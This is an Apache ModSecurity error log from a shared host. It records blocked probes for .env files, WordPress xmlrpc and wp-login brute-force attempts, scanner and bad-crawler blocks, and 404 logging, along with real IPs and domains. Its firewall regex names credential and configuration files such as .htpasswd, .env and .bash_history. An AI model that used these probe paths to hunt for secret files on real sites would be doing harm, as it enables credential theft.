[Tue May 26 13:57:29.533066 2026] [security2:error] [pid 560287:tid 560465] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZcZmX5s6sDS3wJVcsyQAAALI"]
[Tue May 26 13:57:30.935817 2026] [security2:error] [pid 555743:tid 555966] [client 129.222.147.134:13961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZcsjqAquC0YaxQjDI_gAAAWc"]
[Tue May 26 13:57:30.942952 2026] [security2:error] [pid 555743:tid 555966] [client 129.222.147.134:13961] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZcsjqAquC0YaxQjDI_gAAAWc"]
[Tue May 26 13:57:30.950085 2026] [security2:error] [pid 560287:tid 560456] [client 176.65.139.233:45458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.stockmarketanalysis.in"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVZcpmX5s6sDS3wJVcs2QAAAKk"]
[Tue May 26 13:57:30.950354 2026] [security2:error] [pid 555743:tid 555994] [client 176.65.139.231:27138] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.stockmarketanalysis.in"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVZcsjqAquC0YaxQjDI_wAAAYM"]
[Tue May 26 13:57:30.951812 2026] [security2:error] [pid 555743:tid 555924] [client 176.65.139.232:61420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.stockmarketanalysis.in"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVZcsjqAquC0YaxQjDJAAAAAT0"]
[Tue May 26 13:57:30.962812 2026] [security2:error] [pid 560287:tid 560524] [client 176.65.139.239:21038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.stockmarketanalysis.in"] [uri "/.env"] [unique_id "ahVZcpmX5s6sDS3wJVcs2gAAAOo"]
[Tue May 26 13:57:30.967108 2026] [security2:error] [pid 555743:tid 555939] [client 176.65.139.231:27154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVZcsjqAquC0YaxQjDJAQAAAUw"]
[Tue May 26 13:57:30.973892 2026] [security2:error] [pid 560287:tid 560436] [client 176.65.139.238:47188] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.stockmarketanalysis.in"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahVZcpmX5s6sDS3wJVcs2wAAAJc"]
[Tue May 26 13:57:31.228979 2026] [security2:error] [pid 560287:tid 560442] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZcpmX5s6sDS3wJVcs2AAAAJw"]
[Tue May 26 13:57:31.506783 2026] [security2:error] [pid 555743:tid 555911] [client 45.163.203.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZc8jqAquC0YaxQjDJBgAAATA"], referer: https://www.anujtradingco.com/
[Tue May 26 13:57:32.106877 2026] [security2:error] [pid 560287:tid 560505] [client 20.104.227.76:5445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/function/function.php"] [unique_id "ahVZdJmX5s6sDS3wJVcs3wAAANc"]
[Tue May 26 13:57:32.899437 2026] [security2:error] [pid 555743:tid 555921] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZdMjqAquC0YaxQjDJFAAAATo"]
[Tue May 26 13:57:33.030993 2026] [security2:error] [pid 555743:tid 555837] [remote 5.78.119.122:50976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVZdMjqAquC0YaxQjDJFQABWF0"]
[Tue May 26 13:57:33.315058 2026] [security2:error] [pid 555743:tid 555948] [client 202.141.30.10:35424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZdcjqAquC0YaxQjDJHQAAAVU"]
[Tue May 26 13:57:33.315160 2026] [security2:error] [pid 555743:tid 555948] [client 202.141.30.10:35424] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZdcjqAquC0YaxQjDJHQAAAVU"]
[Tue May 26 13:57:33.720393 2026] [security2:error] [pid 560287:tid 560551] [client 103.190.132.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZdZmX5s6sDS3wJVcs9AAAAQM"], referer: https://www.anujtradingco.com/
[Tue May 26 13:57:34.373388 2026] [autoindex:error] [pid 560287:tid 560542] [client 66.249.70.193:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:57:34.740698 2026] [security2:error] [pid 560287:tid 560476] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZdpmX5s6sDS3wJVcs-gAAALw"]
[Tue May 26 13:57:36.108541 2026] [security2:error] [pid 560287:tid 560513] [client 176.65.139.239:21066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stockmarketanalysis.jiyani.in"] [uri "/.env"] [unique_id "ahVZeJmX5s6sDS3wJVctFAAAAN8"]
[Tue May 26 13:57:36.298451 2026] [security2:error] [pid 560287:tid 560438] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZd5mX5s6sDS3wJVctEwAAAJk"]
[Tue May 26 13:57:36.544314 2026] [security2:error] [pid 560287:tid 560478] [client 106.192.248.115:61502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZeJmX5s6sDS3wJVctGAAAAL4"]
[Tue May 26 13:57:36.544482 2026] [security2:error] [pid 560287:tid 560478] [client 106.192.248.115:61502] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZeJmX5s6sDS3wJVctGAAAAL4"]
[Tue May 26 13:57:38.275489 2026] [security2:error] [pid 555743:tid 555973] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZecjqAquC0YaxQjDJRQAAAW4"]
[Tue May 26 13:57:39.246523 2026] [security2:error] [pid 560287:tid 560338] [remote 14.194.98.249:60039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 249.98.194.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVZe5mX5s6sDS3wJVctLgAAxDI"]
[Tue May 26 13:57:40.190375 2026] [security2:error] [pid 560287:tid 560492] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZe5mX5s6sDS3wJVctNgAAAMs"]
[Tue May 26 13:57:41.305377 2026] [security2:error] [pid 555743:tid 555953] [client 129.222.147.134:29208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZfcjqAquC0YaxQjDJaAAAAVo"]
[Tue May 26 13:57:41.305542 2026] [security2:error] [pid 555743:tid 555953] [client 129.222.147.134:29208] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZfcjqAquC0YaxQjDJaAAAAVo"]
[Tue May 26 13:57:41.684613 2026] [security2:error] [pid 560287:tid 560539] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZfZmX5s6sDS3wJVctQwAAAPc"]
[Tue May 26 13:57:42.395949 2026] [security2:error] [pid 560287:tid 560456] [client 168.149.48.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZfZmX5s6sDS3wJVctSwAAAKk"]
[Tue May 26 13:57:42.721186 2026] [security2:error] [pid 560287:tid 560461] [client 167.160.68.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZfpmX5s6sDS3wJVctVwAAAK4"], referer: https://www.anujtradingco.com/
[Tue May 26 13:57:42.819760 2026] [autoindex:error] [pid 555743:tid 555885] [client 185.243.218.226:43108] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: midrivermarina.com
[Tue May 26 13:57:43.269415 2026] [security2:error] [pid 560287:tid 560505] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZfpmX5s6sDS3wJVctWQAAANc"]
[Tue May 26 13:57:44.200509 2026] [security2:error] [pid 555743:tid 555936] [client 167.160.68.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZgMjqAquC0YaxQjDJgwAAAUk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1445612&moderation-hash=523ed7f2804fc92cea6ca7b4c0b1a733
[Tue May 26 13:57:44.364807 2026] [security2:error] [pid 555743:tid 555994] [client 202.141.30.10:35465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZgMjqAquC0YaxQjDJhAAAAYM"]
[Tue May 26 13:57:44.364963 2026] [security2:error] [pid 555743:tid 555994] [client 202.141.30.10:35465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZgMjqAquC0YaxQjDJhAAAAYM"]
[Tue May 26 13:57:44.760183 2026] [security2:error] [pid 560287:tid 560535] [client 85.208.96.195:25672] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/list/"] [unique_id "ahVZgJmX5s6sDS3wJVctbQAAAPU"]
[Tue May 26 13:57:44.760328 2026] [security2:error] [pid 560287:tid 560535] [client 85.208.96.195:25672] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/list/"] [unique_id "ahVZgJmX5s6sDS3wJVctbQAAAPU"]
[Tue May 26 13:57:45.028219 2026] [security2:error] [pid 555743:tid 555911] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZgMjqAquC0YaxQjDJiQAAATA"]
[Tue May 26 13:57:46.977860 2026] [security2:error] [pid 555743:tid 555949] [client 172.226.42.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVZgcjqAquC0YaxQjDJmAAAAVY"]
[Tue May 26 13:57:47.243360 2026] [security2:error] [pid 560287:tid 560531] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZgpmX5s6sDS3wJVctgAAAAPE"]
[Tue May 26 13:57:47.377595 2026] [security2:error] [pid 555743:tid 555847] [remote 141.98.11.117:41596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.11.98.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVZg8jqAquC0YaxQjDJrAABb2c"]
[Tue May 26 13:57:48.199578 2026] [security2:error] [pid 555743:tid 555922] [client 106.192.248.115:61819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZhMjqAquC0YaxQjDJuwAAATs"]
[Tue May 26 13:57:48.202234 2026] [security2:error] [pid 555743:tid 555922] [client 106.192.248.115:61819] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZhMjqAquC0YaxQjDJuwAAATs"]
[Tue May 26 13:57:48.652685 2026] [security2:error] [pid 560287:tid 560550] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZhJmX5s6sDS3wJVctjwAAAQI"]
[Tue May 26 13:57:49.236577 2026] [security2:error] [pid 555743:tid 555791] [remote 111.229.141.137:56586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVZhcjqAquC0YaxQjDJxQABSS8"]
[Tue May 26 13:57:49.263269 2026] [security2:error] [pid 560287:tid 560504] [client 167.160.68.180:29787] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVZhJmX5s6sDS3wJVctlgAAANY"], referer: https://anujtradingco.com
[Tue May 26 13:57:50.209603 2026] [security2:error] [pid 555743:tid 555992] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZhcjqAquC0YaxQjDJywAAAYE"]
[Tue May 26 13:57:50.495199 2026] [security2:error] [pid 560287:tid 560309] [remote 46.224.234.158:40160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVZhpmX5s6sDS3wJVctqgAAiBU"]
[Tue May 26 13:57:51.476351 2026] [security2:error] [pid 560287:tid 560527] [client 129.222.147.134:26027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZh5mX5s6sDS3wJVctvQAAAO0"]
[Tue May 26 13:57:51.476497 2026] [security2:error] [pid 560287:tid 560527] [client 129.222.147.134:26027] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZh5mX5s6sDS3wJVctvQAAAO0"]
[Tue May 26 13:57:51.540115 2026] [security2:error] [pid 560287:tid 560496] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZh5mX5s6sDS3wJVcttgAAAM8"]
[Tue May 26 13:57:53.867910 2026] [security2:error] [pid 560287:tid 560509] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZiZmX5s6sDS3wJVct3QAAANs"]
[Tue May 26 13:57:55.523610 2026] [security2:error] [pid 560287:tid 560475] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZi5mX5s6sDS3wJVct-wAAALs"]
[Tue May 26 13:57:56.650574 2026] [security2:error] [pid 560287:tid 560463] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZjJmX5s6sDS3wJVcuCQAAALA"]
[Tue May 26 13:57:57.272696 2026] [security2:error] [pid 555743:tid 555873] [client 202.141.30.10:65446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZjcjqAquC0YaxQjDKBAAAAQo"]
[Tue May 26 13:57:57.273212 2026] [security2:error] [pid 555743:tid 555873] [client 202.141.30.10:65446] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZjcjqAquC0YaxQjDKBAAAAQo"]
[Tue May 26 13:57:57.424694 2026] [security2:error] [pid 560287:tid 560322] [remote 178.104.90.233:60424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVZjZmX5s6sDS3wJVcuEgAAniI"]
[Tue May 26 13:57:57.555603 2026] [security2:error] [pid 555743:tid 555972] [client 106.192.248.115:62123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZjcjqAquC0YaxQjDKCgAAAW0"]
[Tue May 26 13:57:57.573176 2026] [security2:error] [pid 555743:tid 555972] [client 106.192.248.115:62123] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZjcjqAquC0YaxQjDKCgAAAW0"]
